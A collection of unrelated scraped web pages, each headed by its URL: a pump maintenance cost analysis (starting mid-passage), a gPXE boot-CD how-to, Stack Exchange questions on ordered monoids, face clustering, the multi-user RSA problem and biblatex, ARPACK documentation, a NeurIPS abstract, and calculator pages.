We can determine the maintenance cost incurred in the absence of any scheduled repairs by setting the maintenance interval to MTTF and the percentage of failed pumps to 100% in the above formulas. The degenerate formulas for no scheduled maintenance are:
\begin{aligned} (17a)\quad & C_{\mathrm{adjusted}} \, = \, \$1,360.00 \, \times \, \left( \frac{12}{\mathrm{MTTF}} \right) \, = \, \$480.00 & \quad\text{Annualized cost of repair} \\ \end{aligned}
\begin{aligned} (19a)\quad & C_{\mathrm{lost\ revenue}} \, = \, \$782.78 \, \times \, 7 \, = \, \$5,479.46 & \quad\text{Per pump per repair} \\ & \$5,479.46 \, \times \, \left( \frac{12}{\mathrm{MTTF}} \right) \, = \, \$1,933.93 & \quad\text{Annualized} \\ \end{aligned}
Resulting in a total cost prior to scheduling maintenance of:
\begin{aligned} (22)\quad & C_{\mathrm{total}} \, = & \, \$480.00 \, + \, \$1,933.93 \, = \, \$2,413.93 & \quad\text{Annual cost per pump} \\ & C_{\mathrm{entire}} \, = & \, n_{\mathrm{total}} \, \times \, \$2,413.93 \, = \, \$16,897,510.00 & \quad\text{Total annualized cost of repairs} \\ \end{aligned}
Now that we have a cost for repairs without scheduled maintenance, we can find the cost with scheduled maintenance and then identify the optimum maintenance age for the pumps, as well as the total annualized cost of repairs (to compare scheduled v. non-scheduled).
total_cost <- function(t, mu, sigma) {
  c_adjusted(t, mu, sigma) + c_lostrevenue(t, mu, sigma)
}

min_costs <- apply(model_conditions, 1,
                   function(r) optimize(total_cost, c(15, mttf), r[1], r[2], tol = 0.01))
The annualized cost per pump, per year, for the nominal case is $1,360.85. The maintenance interval at the minimum cost (prescribed repair age) is 25.8 months. Annualized and summed over all of the pumps, the cost becomes:
\begin{aligned} (23)\quad & C_{\mathrm{total}} \, = & \, \$1,360.85 & \quad\text{Annual cost per pump} \\ & C_{\mathrm{entire}} \, = & \, n_{\mathrm{total}} \, \times \, \$1,360.85 \, = \, \$9,525,950.00 & \quad\text{Total annualized cost of repairs} \\ \end{aligned}
## Discussion and Cautions
To summarize the results:
• When not performing scheduled maintenance (repairing pumps only after failure), the annual cost is $2,413.93 per pump, or $16.9M for the entire business.
• When performing scheduled maintenance at an interval of 25.8 months, the annual cost is $1,360.85 per pump, or $9.5M for the entire business.
• Implementing scheduled maintenance results in a savings of 43.6% (costs are 56.4% of the base case).
• Implementing scheduled maintenance saves $1,052.48 per pump annually, or $7.4M for the corporation.
When we created our model, we made several simplifying assumptions. Among them was that the pumps would fail with a probability described by a log-normal distribution. This may or may not be correct; the actual failure mechanisms that contribute to the failures might generate a different distribution. We did not account for the entire observed failure behavior of real components: they exhibit many failures at an early age (which we ignored, assuming the pumps and parts we used were "burned in"), and they also exhibit a small but non-zero failure rate during the majority of their lifetime. We did account for the "end-of-life" failures that are typically observed, but used a log-normal distribution. This is likely to be acceptable, but more detailed analysis is warranted.
Prior to instituting the scheduled maintenance, we would expect to see many failures at a steady rate over time. This would be expected to be near $$\frac{n_{\mathrm{total}}}{\mathrm{MTTF}}$$, or 206 failures per month. This would mean that the 50 sample window we assumed for estimating the parameters would span a time of about 1 week.
After adopting the scheduled maintenance, we would expect to observe a much smaller number of failures, since we are deliberately attempting to perform maintenance prior to failures in most cases. The number of failures that we would expect to see when using scheduled maintenance is $$\frac{n_{\mathrm{total}}}{\mathrm{MTTF}} \, \times \, F(t_{\mathrm{interval}})$$, or 13.5 failures per month. This is a much smaller observation rate, and a 50 sample window will span a time of 16 weeks. This means that any updates to the maintenance interval will be much slower to adapt to any changes in the actual failure rates if they occur.
From the estimator performance we can see that it is possible to diverge quite far from the actual model parameters for short times. It would be prudent to implement a limit to changes in the maintenance interval in an attempt to smooth any excursions due to estimation error.
From the total cost curve plot, we can see that the area where the optimal maintenance interval occurs is a shallow minimum. This is encouraging since it means that any error in the implemented interval from the actual optimal interval will be close in cost to the desired minimum cost. This means that even if we selected a probability density function that was not accurate, it is likely that a more accurate density function would result in a similar interval selection.
http://linuxczar.net/blog/2012/01/05/dumb-tricks-with-gpxe/
For my first bit of magic with gPXE I decided to replace the boot ISOs I have for folks who are unable to install machines via PXE. With gPXE I don't need my RHEL initrd and kernel image to bootstrap myself into an install from a CD or USB stick. I've encoded the TFTP server and the file name to grab and execute into the gPXE image, so as long as the machine can get any type of DHCP lease it will load up my PXELINUX environment. This makes the boot CD images work identically to doing a real PXE boot…because you are.
Step 1: I grabbed the gPXE distribution and unpacked it. I patched its autoboot functionality as described here. This lets me DHCP automatically even if the first ethernet device is not the one connected to the network. For gPXE 1.0.1 you can use my patch instead.
Step 2: Make an embedded script file. This just supplies the information to gPXE that a normal PXE boot would get from the next-server and filename options in the DHCP response.
#!gpxe
autoboot
chain tftp://FQDN/pxelinux.0
Yup, we have DNS support so just add the FQDN of your TFTP server. In my setup I have pxelinux.0 in the root of my TFTP server.
Step 3: Build gPXE with your embedded script.
make EMBEDDED_IMAGE=path/to/your/script
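For a bootable CD specifically, the ISO is one of the standard gPXE build products, so the invocation is presumably along these lines (an assumption about the exact target name, not stated in the original):

make bin/gpxe.iso EMBEDDED_IMAGE=path/to/your/script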
Step 4: Burn the resulting ISO onto a CD and PXE boot a PXE-less machine.
https://math.stackexchange.com/questions/636971/recovering-ordered-monoid-operation-from-the-order
Recovering Ordered Monoid Operation from the Order
I have a partially ordered set $(X, \preceq)$ with the following properties:
• $X$ has a minimum. I'll name it $1$.
• For every $x \in X$, the principal filter ${\uparrow} x$ is order isomorphic to $X$.
I am wondering if it is possible to give $X$ the structure of an ordered monoid with $1$ as the identity. It seems like the map $\varphi_x: X \xrightarrow\cong {\uparrow} x \subseteq X$ could be thought of as an action of $x$ on $X$, but I am not sure how to justify that $\varphi_x \circ \varphi_y$ is of the form $\varphi_z$. Each $\varphi_x$ may not even be unique(?) Is it possible to choose $\varphi_x$'s in a consistent way?
Does it help if $X$ is an upward directed set, a join semilattice or a lattice? Would it be helpful if $X$ is well-founded?
Origin of the Problem:
I'll describe how this question comes up. I start with an ordered monoid $X$ whose identity $1$ is the minimum. The monoid operation and the order $\preceq$ satisfy:
$$x \preceq y \text{ if and only if there exists a unique } z \text{ with } zx = y. \tag{1}$$
If $x \preceq y$, we can write $\frac{y}{x}$ to refer to the unique element $z$ satisfying $zx = y$. Because $1$ is the minimum, $X$ is right cancellative: for $xz = yz$, $z \preceq yz$, and so $x = \frac{yz}z = y$. $X$ is not necessarily left cancellative, but $\frac{xy}x$ always exists because $1 \preceq y$, and so $x \preceq xy$. One potential problem is I don't know that $\frac{xy}x = y$. (My fraction notation here is not symmetric. The denominator is actually to the "right" of the numerator. This asymmetry is due to $(1)$ being asymmetric.) However, that is not the most important part of the question. It might be related though.
The main question is: Can we recover the monoid operation from $\preceq$? Of course $\preceq$ must come from the monoid operation, so it will have many properties that may be useful. The question formulated at the beginning is based only on some properties of $\preceq$. My guess is that there are other potentially useful properties that I have not found.
Also, if there are interesting special cases that would make the answer positive, I would be happy to hear about them. Well-foundedness might seem natural, but it is rather strong, and does not apply to $\mathbb R_{\ge 0}$.
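(A concrete instance, added for illustration: $(\mathbb{N}, +)$ and $(\mathbb{R}_{\ge 0}, +)$ with the usual order satisfy $(1)$, since $x \preceq y$ exactly when there is a unique $z$ with $z + x = y$; there ${\uparrow} x$ is order isomorphic to the whole poset via $t \mapsto t + x$, and the operation to be recovered is addition.)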
• When you talk about an ordered monoid $(M, \leqslant)$, you assume that $x \leqslant y$ implies $zx \leqslant zy$ and $xz \leqslant yz$, right? – J.-E. Pin Jan 29 '14 at 18:43
• @J.-E.Pin Yes, that is what I meant. It seems to me that the answer to this question is negative although I haven't been able to come up with a counterexample. – Tunococ Feb 10 '14 at 2:40
https://dsp.stackexchange.com/questions/38626/image-preprocessing-for-facial-detection-embedding-clustering-pipeline
# Image preprocessing for facial detection->embedding->clustering pipeline
I am trying to implement an end-to-end pipeline for facial clustering so that it can group people with the same faces. This will be quite a long post; as I know that this is a very broad topic, I have listed out what I have done step by step to show the pipeline that I currently have.
So far this is what I have done:
Detection
I used the dlib library to detect the bounding boxes for faces in the image (dlib's HOG-based frontal face detector). The 68-point shape predictor loaded below implements the ensemble-of-regression-trees landmark method of Vahid Kazemi and Josephine Sullivan.
# Imports assumed by these snippets
import copy
import dlib
import cv2
import numpy as np
import matplotlib.image as mpimg

# Setup the models
face_detector = dlib.get_frontal_face_detector()
predictor_model = "shape_predictor_68_face_landmarks.dat"
face_pose_predictor = dlib.shape_predictor(predictor_model)
# Define the variables needed for the affine transform
w, h = 160, 160
eye_corner_dst = [[np.int(0.3 * w), np.int(h / 3)],\
[np.int(0.7 * w), np.int(h / 3)]]
# Get an image and find the faces
image = mpimg.imread(image_path)[:,:,0:3].astype(np.uint8) # RGBA -> RGB
detected_face = face_detector(image)
faces = []
Alignment: Part 1
After the boxes containing the faces are found, I loop through all the detected boxes and find the facial landmarks that are used to align the faces. The transform to align the faces is computed in similarity_transform; in this function, two extra points are created in such a way that each new point forms an equilateral triangle with the two input points in eye_corner_src and eye_corner_dst respectively. An affine transform can then be estimated using cv2.estimateRigidTransform, and the resulting transform is stored in the transform variable. Finally, I transform all detected landmarks with this affine transform (stored in landmarks_t) and create a Face object to store the relevant data, which is appended to faces.
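The helper itself is not shown in the post; here is a minimal sketch of what similarity_transform might look like, assuming the common trick of synthesizing a third point so that cv2.estimateRigidTransform (available in older OpenCV releases) has the three correspondences it needs. This is our reconstruction, not the original code:

def similarity_transform(in_points, out_points):
    # Each pair of points is extended with a third point forming an
    # equilateral triangle, since the estimator wants 3 correspondences.
    s60, c60 = np.sin(np.pi / 3.0), np.cos(np.pi / 3.0)
    def with_third_point(points):
        (x1, y1), (x2, y2) = points
        x3 = c60 * (x1 - x2) - s60 * (y1 - y2) + x2
        y3 = s60 * (x1 - x2) + c60 * (y1 - y2) + y2
        return [[x1, y1], [x2, y2], [x3, y3]]
    src = np.array([with_third_point(in_points)], dtype=np.float32)
    dst = np.array([with_third_point(out_points)], dtype=np.float32)
    # estimateRigidTransform was removed in OpenCV 4;
    # cv2.estimateAffinePartial2D is the modern replacement.
    return cv2.estimateRigidTransform(src, dst, False)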
for face_rect in detected_face:
    # First crop the face
    left = max(0, face_rect.left())
    top = max(0, face_rect.top())
    right = min(image.shape[1], face_rect.right())
    bottom = min(image.shape[0], face_rect.bottom())
    new_face_rect = dlib.rectangle(0, 0, right - left, bottom - top)
    cropped_image = copy.deepcopy(image)[top:bottom, left:right, :].astype(np.uint8)

    # Get the landmarks for the face
    pose_landmarks = face_pose_predictor(cropped_image, new_face_rect)
    # This function just returns an array of an array of points for the landmarks
    landmarks = get_landmark_points(pose_landmarks, dlib_point=False)

    # Get source points
    left_eye = landmarks[36]
    right_eye = landmarks[45]
    eye_corner_src = [left_eye, right_eye]

    # Compute similarity transform (returns a 2x3 affine matrix)
    transform = similarity_transform(eye_corner_src, eye_corner_dst)

    # Apply similarity transform on image
    cropped_image_t = cv2.warpAffine(cropped_image, transform, (w, h))

    # Apply similarity transform to the landmark points
    # Note here rs stands for reshape, t for transformed
    landmarks_rs = np.reshape(np.array(landmarks), (68, 1, 2))
    landmarks_t = cv2.transform(landmarks_rs, transform)

    # Append boundary points, which will be used in Delaunay triangulation
    landmarks_t = np.float32(np.reshape(landmarks_t, (68, 2)))
    faces.append(Face(cropped_image_t, landmarks_t))
This is the result at the end of the first part of the alignment stage
Alignment: Part 2
Now that the landmarks are found, the goal is to align the face using Delaunay triangulation, but to do this I need destination points for the landmark points. Therefore, I simply chose a front-facing picture and found the landmark points for that picture.
Here is a result of that:
Alignment: Part 3
In this final part of the alignment, I use Delaunay triangulation (computed from the destination landmarks found in Part 2) to align the affine-transformed face (found in Part 1) with the "ideal" face (found in Part 2) triangle by triangle. This is done so that all the facial features appear in the same place.
# Get the Delaunay triangles; rect is the bounding rectangle of the
# output image, and landmarks_dst are the "ideal" landmarks from Part 2
dt = calculateDelaunayTriangles(rect, np.array(landmarks_dst))

# Get the transformed landmarks
landmarks_t = face.landmarks

# Get the transformed image of the face
face_image = face.face_image.copy()

# Output image
output = np.zeros((h, w, 3), np.float32)

# Transform the triangles one by one
for j in range(len(dt)):
    triangleIn = []
    triangleOut = []

    # Here we are getting the jth triangle (remember this is a 3-tuple,
    # each entry an index into landmarks_t or landmarks_dst)
    for k in range(3):
        pointIn = landmarks_t[dt[j][k]]
        pointIn = constrainPoint(pointIn, w, h)
        pointOut = landmarks_dst[dt[j][k]]  # the fixed destination landmarks
        pointOut = constrainPoint(pointOut, w, h)
        triangleIn.append(pointIn)
        triangleOut.append(pointOut)

    # Now draw on the new image
    warpTriangle(face_image, output, triangleIn, triangleOut)
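warpTriangle is not shown either; here is a minimal sketch of the usual OpenCV approach (warp the source triangle's bounding-box patch, then mask in only the pixels inside the destination triangle; the details are illustrative):

def warpTriangle(img_in, img_out, tri_in, tri_out):
    # Bounding boxes of the source and destination triangles
    r_in = cv2.boundingRect(np.float32([tri_in]))
    r_out = cv2.boundingRect(np.float32([tri_out]))

    # Triangle coordinates relative to their bounding boxes
    tri_in_rect = [(p[0] - r_in[0], p[1] - r_in[1]) for p in tri_in]
    tri_out_rect = [(p[0] - r_out[0], p[1] - r_out[1]) for p in tri_out]

    # Affine-warp the source patch onto the destination patch size
    patch = img_in[r_in[1]:r_in[1] + r_in[3], r_in[0]:r_in[0] + r_in[2]]
    m = cv2.getAffineTransform(np.float32(tri_in_rect), np.float32(tri_out_rect))
    warped = cv2.warpAffine(patch, m, (r_out[2], r_out[3]),
                            flags=cv2.INTER_LINEAR,
                            borderMode=cv2.BORDER_REFLECT_101)

    # Write only the pixels inside the destination triangle
    mask = np.zeros((r_out[3], r_out[2], 3), dtype=np.float32)
    cv2.fillConvexPoly(mask, np.int32(tri_out_rect), (1.0, 1.0, 1.0), 16, 0)
    roi = img_out[r_out[1]:r_out[1] + r_out[3], r_out[0]:r_out[0] + r_out[2]]
    img_out[r_out[1]:r_out[1] + r_out[3], r_out[0]:r_out[0] + r_out[2]] = \
        roi * (1 - mask) + warped * mask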
This is the output image after all the triangles are warped:
This is the image that is used to create the facial features.
Feature Extraction
I used facenet to extract the facial features. All I did here was to load up the model and run my image through the network to obtain the extracted feature, which is a 128-dimensional embedding normalized to lie on the unit sphere.
# Now utilize facenet to find the embeddings of the faces
import tensorflow as tf
import facenet

MODEL_DIR = "20170216-091149"

# Get the save files for the models
meta_file, ckpt_file = facenet.get_model_filenames(MODEL_DIR)

with tf.Graph().as_default():
    with tf.Session().as_default() as sess:
        embedding_layer = facenet.custom_load_model(sess, MODEL_DIR, meta_file, ckpt_file)
        # Find the embedding for the face
        face_embedding = embedding_layer(output)
Clustering

Before the clustering step I perform PCA (although my results show that it does not increase the accuracy by much), since clustering doesn't work that well in high dimensions.
Note here that I have assumed a variable face_embeddings which stacks multiple face_embedding vectors, one per face.
from sklearn.decomposition import PCA

pca = PCA(n_components=10)  # captures ~91% of the variance
face_embeddings_reduced = pca.fit_transform(face_embeddings)
I then cluster the reduced embeddings with K-means:

from sklearn.cluster import KMeans

clusterer = KMeans(n_clusters=2, random_state=10)
cluster_labels = clusterer.fit_predict(face_embeddings_reduced)
The results that I got were not that good; moreover, I manually determined the number of clusters (a sketch of choosing it automatically is below), and I only tested images from 2 different people.
Here are the results:
Cluster 0 has individuals: {'Abdullah_Gul': 6, 'Bill_Gates': 8}
Cluster 1 has individuals: {'Abdullah_Gul': 10, 'Bill_Gates': 9}
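One incremental improvement I have been considering (not yet part of the pipeline, so treat this as a sketch) is choosing the number of clusters automatically with the silhouette score instead of fixing it by hand:

from sklearn.metrics import silhouette_score

best_k, best_score = None, -1.0
for k in range(2, 11):
    labels = KMeans(n_clusters=k, random_state=10).fit_predict(face_embeddings_reduced)
    score = silhouette_score(face_embeddings_reduced, labels)
    if score > best_score:
        best_k, best_score = k, score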
I am wondering where my pipeline can be improved, and what the cause of this low accuracy is. Is it during face alignment? Is the method that I'm using outdated? I have read about using two CNNs to create a pipeline: the first network being MTCNN for creating the bounding boxes for faces, and the second network from here, which has a Spatial Transformer module in the first layer to automatically align the faces. If someone could provide me with some resources to read or some pointers, that would be great!
https://wiki.linuxfoundation.org/driver-backport/kmp_macros
KMP Macros
Purpose

This page will eventually provide an "API Reference" for the macros used to build KMPs with the standard spec file on https://www.linux-foundation.org/en/Sample_KMP_spec_file .

Process
1. Work through the "Current Issues" section below.
2. Fill in the “KMP Macros - API Reference” section below.
Current Issues
1. Can we agree to just call the main macro %kernel_module_package?
2. %kernel_module_package macro needs to include an option to the macro that specifies the pciid that gets installed in a standard location when the KMP is installed.
3. We need an option that specifies the firmware file that gets installed in a standard location when the KMP is installed.
4. We need an option that specifies that the modules in the KMP get added to the initrd when installed.
5. Can we pull the explicit %package KMP stuff (in the SUSE spec file) into %suse_kernel_module_subpackage? Or can we just remove it from the spec file? (Removing it would eliminate the ability for SUSE subpackages to have a different summary and description from the main package.)
6. Can we invent %make_build and %make_install macros that take flavor as an argument? That will hide the details of the make command behind the macros.
7. Can we invent an %install_mod macro to handle INSTALL_MOD_PATH and INSTALL_MOD_DIR?
Proposed Standard KMP Macros
kernel_module_package_buildreqs
Should evaluate to: Everything needed for “BuildRequires”.
SUSE needs to change kernel_module_package_buildreq to kernel_module_package_buildreqs and update "build" so that it can handle this macro.

kernel_source() - Already Works on SUSE and Red Hat

Should evaluate to: Directory containing the top-level kernel Makefile (used in "make -C %{kernel_source $flavor} modules M=$PWD/obj/$flavor").

_kermoddir

Should evaluate to: Directory for installed modules. I.e., SUSE would evaluate to "updates", Red Hat would evaluate to "updates/%name".
Suggested macro for SUSE to add to /usr/lib/rpm/macros:
` %_kermoddir(n:) %{expand:%(echo "updates")}`
Suggested macro for Red Hat to add to /usr/lib/rpm/redhat/macros:
``` %_kermoddir(n:) %{expand:%( \
https://solvedlib.com/n/10-0-6-points-detailsprevious-answerszillengmath6-9-5-015,7686786
# Find the directional derivative of the given function at the given point in the indicated direction

Question:

$$f(x, y) = (xy + 1)^2; \quad (7, 6),\ \text{in the direction of}\ (9, 7). \qquad \text{Find } D_u f(7, 6).$$
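A worked sketch of the computation:

$$\nabla f = \left(2y(xy+1),\; 2x(xy+1)\right), \qquad \nabla f(7,6) = (2\cdot 6\cdot 43,\; 2\cdot 7\cdot 43) = (516,\; 602)$$

$$u = \frac{(9,7)}{\sqrt{9^2+7^2}} = \frac{(9,7)}{\sqrt{130}}, \qquad D_u f(7,6) = \frac{516\cdot 9 + 602\cdot 7}{\sqrt{130}} = \frac{8858}{\sqrt{130}} \approx 776.9$$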
https://crypto.stackexchange.com/questions/81145/multi-users-rsa-problem
# Multi-users RSA problem
Rivest and Kalisky's RSA problem considers various notions on security of the RSA One-Way Trapdoor Permutation. They do it only from the perspective of a single user.
What's the state of the art in the multi-users RSA problem and its reduction to other problems?
Assume a public directory of $$u$$ public keys $$(N_i,e_i)$$ all with the same bit size $$|N_i|=k$$. Assume $$N_i=p_i\,q_i$$ with $$p_i,q_i\in[\,\lceil2^{(k-1)/2}\rceil,2^{k/2}\,)$$. Assume these primes chosen independently and uniformly at random among those with $$\gcd(p_i-1,e_i)=1=\gcd(q_i-1,e_i)$$ for some odd $$e_i\ge3$$, unless that matters.
Adversaries succeed if they pass this test:
1. Challenger draws and submits random $$y\in[0,2^{k-1})$$
2. Adversary chooses and submits $$i\in[0,u)$$
3. Adversary submits $$x$$ and succeeds if $$x^{e_i}\bmod N_i=y$$.
Make this the multi-users RSA (authentication¹) problem. Add two-pass when we exchange 1 and 2 (forcing the adversary to choose its target before the challenger supplies the challenge $$y$$), which can only make the attacker's task harder. Add low exponent when $$|e|$$ is upper-bounded by a constant value. Add fixed exponent when $$\forall i,\ e_i=e$$.
For concreteness, consider an access control system using Smart Cards to authenticate users, where each has internally drawn a public/private key pair. Assume keys per² FIPS 186-4 appendix B.3, which wants $$k\in\{1024,2048,3072\}$$ and $$|e|\in(16,256]$$. Assume $$e=65537$$ when $$e$$ is fixed. Noticeably, there are special conditions on the primes mandated specifically when $$k=1024$$, and part of the question is: are they useful³ for some practical parameter $$u$$?
¹ Omit authentication unless relevant. We could define a multi-users RSA encryption problem, but it has less practical relevance. And when a legitimate user's ability to decipher random challenges is used to authenticate, that multi-users RSA encryption problem becomes equivalent to our multi-users authentication RSA problem: the restriction $$y\in[0,2^{k-1})$$ is minor, and using the multiplicative property of RSA can be shown irrelevant, I guess.
² This reference's $$nlen$$ is our $$k$$. We use the notation in the landmark proof of PSS by Bellare and Rogaway (1996), and the improved proof of FDH by Coron (2000).
³ One of these precautions is that $$p-1$$ has a large prime factor. This is to guard against Pollard's $$p-1$$ factoring algorithm. This algorithm is a non-issue in the (single-user) RSA problem, since factoring algorithms with a much better asymptotic cost are known. That's less evident in the multi-users RSA problem: this algorithm's probability of success grows markedly with $$u$$ at constant cost, when the parameters $$B_1$$ and $$B_2$$ of Pollard's $$p-1$$ are tuned so that all the $$N_i$$ can be tested. For $$k$$ in the low hundreds and $$u$$ in the millions, it seems this strategy beats ECM with random curves (which gives the adversary an advantage independent of $$u$$, AFAIK).
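For reference, a minimal Python sketch of stage 1 of Pollard's $$p-1$$ (the bound is illustrative; the point in the multi-users setting is that the same loop can be run against each $$N_i$$ in turn at essentially constant per-modulus cost):

from math import gcd

def pollard_p_minus_1_stage1(n, b1):
    # Succeeds when some prime p dividing n has p-1 that is
    # b1-smooth (every prime-power factor of p-1 is <= b1).
    a = 2
    for j in range(2, b1 + 1):
        a = pow(a, j, n)  # exponent accumulates all prime powers <= b1
    g = gcd(a - 1, n)
    return g if 1 < g < n else None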
• This problem was studied for DLP and (gap) CDH in a recent Eurocrypt paper. Not sure about the RSA problem. – Occams_Trimmer Jun 3 '20 at 4:05
• How is swapping 1 and 2 making it easier for the attacker? I think it will make it harder, as you have to commit to a user before getting the challenge. – Paŭlo Ebermann Jun 15 '20 at 21:35
• @PaŭloEbermann : swapping 1 and 2 does not make things easier for the attacker, thanks for noticing. It makes the attacker's task harder (e.g. an hypothetical technique to solve the RSA problem when $y\equiv n\bmod e)$ gives a smaller advantage). I repaired the question. – fgrieu Jun 18 '20 at 18:43
http://rsusu1.rnd.runnet.ru/libraries/ARPACK/node66.html
## XYeupd
The purpose of XYeupd is to obtain the requested eigenvalues and eigenvectors (or Schur basis vectors) for the original problem from the information computed by XYaupd for the linear operator $$OP$$. Regardless of whether a spectral transformation is used, the eigenvectors will remain unchanged on transforming back to the original problem. If a spectral transformation is used, then subroutine XYaupd will compute eigenvalues of $$OP$$. Subroutine XYeupd maps them to eigenvalues of the original problem, except in two cases. The exceptions occur when using [s,d]naupd with a complex shift $$\sigma$$ with $$OP$$ taken as either the real or the imaginary part of the shift-invert operator. Note that if $$\sigma$$ is a real shift, [s,d]neupd can recover the eigenvalues, since the spectral mapping is then known explicitly. Otherwise, the eigenvalues must be recovered by the user, preferably by using the converged Ritz vectors and computing Rayleigh quotients with them for the original problem. We hope to automate this step in a future release.
If eigenvectors are desired, an orthonormal basis for the invariant subspace corresponding to the converged Ritz values is first computed. The vectors of this orthonormal basis are called approximate Schur vectors for the original problem. Figure 5.2 outlines our strategy. Refer to Figure 5.2 for definitions of the quantities discussed in the remainder of this section.
1. Compute the partial Schur form, where the converged, wanted Ritz values computed by XYaupd are located on the diagonal of the upper triangular matrix $$R$$ of order $$k$$.
2. Compute the approximate Schur vectors of the original problem by forming $$VQ$$ and placing the result in the first $$k$$ columns of $$V$$. Denote the matrix consisting of these first $$k$$ columns by $$\hat{Q}$$.
3. If eigenvectors are desired, compute the eigendecomposition $$RS = SD$$.
4. Compute the Ritz vectors by forming $$\hat{Q}S$$.
For symmetric eigenvalue problems [s,d]seupd does not need Step 3 of Figure 5.2, since Schur vectors are also eigenvectors. Moreover, a special routine is not required to re-order the Schur form, since $$R$$ is a diagonal matrix of real eigenvalues.
For real non-symmetric eigenvalue problems, [s,d]neupd uses the real Schur form. That is, $$R$$ is an upper quasi-triangular matrix with 1-by-1 and 2-by-2 diagonal blocks; each 2-by-2 diagonal block has its diagonal elements equal and its off-diagonal elements of opposite sign. Associated with each 2-by-2 diagonal block is a complex conjugate pair of eigenvalues. The real eigenvalues are stored on the diagonal of $$R$$. Similarly, $$S$$ is a block diagonal matrix. When the eigenvalue is complex, the complex eigenvector associated with the eigenvalue with positive imaginary part is stored in two consecutive columns of $$S$$. The first column holds the real part of the eigenvector and the second column holds the imaginary part. The eigenvector associated with the eigenvalue with negative imaginary part is simply the complex conjugate of the eigenvector associated with the positive imaginary part. The computed Ritz vectors are stored in the same manner.
The computation of the partial Schur form needed at Step 1 is performed by first calling the appropriate LAPACK subroutine that computes the full Schur decomposition of the projected matrix. Another LAPACK subroutine, Xtrsen, re-orders the computed Schur form to obtain $$R$$ and $$Q$$. The approximate Schur vectors are formed by computing the QR factorization of $$Q$$ and then postmultiplying $$V$$ with the factored form. This avoids the need for the additional storage that would be necessary if $$VQ$$ were computed directly. The appropriate LAPACK subroutines are used to compute and apply the QR factorization of $$Q$$. The factored approach described above is extremely stable and efficient, since $$Q$$ is a numerically orthogonal matrix.
In exact arithmetic, there would be no need to perform the reordering (or the sorting for the symmetric eigenvalue problem). In theory, the implicit restarting mechanism would obviate the need for this. However, computing in finite precision arithmetic (as usual) complicates the issue and makes these final reorderings mandatory. See Chapter 5 in [22] and [26] for further information.
When Ritz vectors are required, the LAPACK subroutine Xtrevc is called to compute the decomposition $$RS = SD$$. Since $$R$$ is an upper quasi-triangular matrix, the product $$\hat{Q}S$$ is easily formed using the level 3 BLAS subroutine Xtrmm.
The computed eigenvectors (Ritz vectors) returned by XYeupd are normalized to have unit length with respect to the semi-inner product that was used. Thus, if the standard inner product was used, they will have unit length in the standard 2-norm. In general, a computed eigenvector will have unit length with respect to the matrix that was specified.
https://nips.cc/Conferences/2021/ScheduleMultitrack?event=27598
Poster: Better Safe Than Sorry: Preventing Delusive Adversaries with Adversarial Training
Lue Tao · Lei Feng · Jinfeng Yi · Sheng-Jun Huang · Songcan Chen
Tue Dec 07 04:30 PM -- 06:00 PM (PST) @ Virtual
Delusive attacks aim to substantially deteriorate the test accuracy of the learning model by slightly perturbing the features of correctly labeled training examples. By formalizing this malicious attack as finding the worst-case training data within a specific $\infty$-Wasserstein ball, we show that minimizing adversarial risk on the perturbed data is equivalent to optimizing an upper bound of natural risk on the original data. This implies that adversarial training can serve as a principled defense against delusive attacks. Thus, the test accuracy decreased by delusive attacks can be largely recovered by adversarial training. To further understand the internal mechanism of the defense, we disclose that adversarial training can resist the delusive perturbations by preventing the learner from overly relying on non-robust features in a natural setting. Finally, we complement our theoretical findings with a set of experiments on popular benchmark datasets, which show that the defense withstands six different practical attacks. Both theoretical and empirical results vote for adversarial training when confronted with delusive adversaries.
https://realjenius.com/tags/jvm/
## Values, Records, and Primitives (Oh My!) - Kotlin & Java's 'Valuable' Future
A couple of years ago, I did a semi-deep-dive on Kotlin Inline Classes and how they were implemented. Kotlin 1.5 was just released, and with it came the evolution of inline classes into the start of value classes. Meanwhile, Kotlin 1.5 also now supports JVM Records, which at first read might sound like a very similar concept. Finally, with JEP-401 Java is going to bring "primitive classes", which also sounds like a very similar concept. This can all sound very confusing, so let's take a look!
Kotlin has an annotation called @JvmDefault which, like most of the “Jvm” prefixed annotations, exists to help massage the Kotlin compiler output to match Java classes in a certain way. This annotation was added in 1.2.40, and has now seen some experimental enhancements in 1.2.50, so it seems worth exploring what this is all about.
https://byjus.com/de-moivres-theorem-calculator/
De Moivre's Theorem Calculator
De Moivre's Theorem Formula:
$$(\cos x + i\sin x)^n = \cos nx + i\sin nx$$
The De Moivre's Theorem Calculator is an online tool which shows De Moivre's theorem for the given input. Byju's De Moivre's Theorem Calculator is a tool which makes calculations simple and interesting. If an input is given, then it can easily show the result for the given number.
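For instance, taking $$n = 3$$, expanding the left-hand side with the binomial theorem and matching real parts yields the triple-angle formula:

$$(\cos x + i\sin x)^3 = \cos^3 x + 3i\cos^2 x\,\sin x - 3\cos x\,\sin^2 x - i\sin^3 x$$

$$\cos 3x = \cos^3 x - 3\cos x\,\sin^2 x = 4\cos^3 x - 3\cos x$$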
https://calculator.academy/conductance-calculator/
Enter the total cross-sectional area, resistivity of the component, and length into the calculator to determine the conductance.
Conductance Formula
The following formula is used to calculate the conductance of an electronic component.
C = A / (p * L)
• Where C is the conductance (siemens)
• A is the area (m^2)
• p is the resistivity (Ω·m)
• L is the length (m)
Conductance Definition
Conductance is defined as the ability of a material or system to transmit the flow of electrons through itself.
Conductance Example
How to calculate conductance?
1. First, determine the area.
Calculate the total area of the material.
2. Next, determine the resistivity.
Calculate the resistivity of the material.
3. Next, determine the length.
Measure the total length of electron flow.
4. Finally, calculate the conductance.
Calculate the conductance using the formula above (a worked numeric example follows below).
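As a quick numeric sketch in Python (the values are illustrative, roughly copper-like):

# Worked example with illustrative values
A = 1e-6         # cross-sectional area in m^2
p = 1.68e-8      # resistivity in ohm-meters (about that of copper)
L = 2.0          # length in m

C = A / (p * L)  # conductance in siemens
print(f"C = {C:.1f} S")  # prints C = 29.8 S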
FAQ
What is conductance?
Conductance is a measure of a material’s ability to allow electrons to flow through it.
What is resistivity?
Resistivity is a measure of a material's opposition to the flow of electrons.
https://tex.stackexchange.com/questions/173345/biblatex-square-brackets-color
# Biblatex square brackets color
How can I change the square brackets color of references in text using biblatex (numeric style)?
I know it can be done with natbib, but I am not using that package anymore.
\documentclass[hidelinks,spanish]{book}
\usepackage[usenames,dvipsnames]{color}
\usepackage[usenames,dvipsnames,svgnames,table]{xcolor}
\definecolor{CeruleanRef}{RGB}{12,127,172}
\usepackage[numbers,sort&compress]{natbib}
\bibpunct{\color{CeruleanRef}[}{\color{CeruleanRef}]}{,}{n}{}{;}
\bibliographystyle{unsrtnat}
\begin{document}
\frontmatter
\mainmatter
A reference: \cite{RBoehler1996}
\appendix
\backmatter
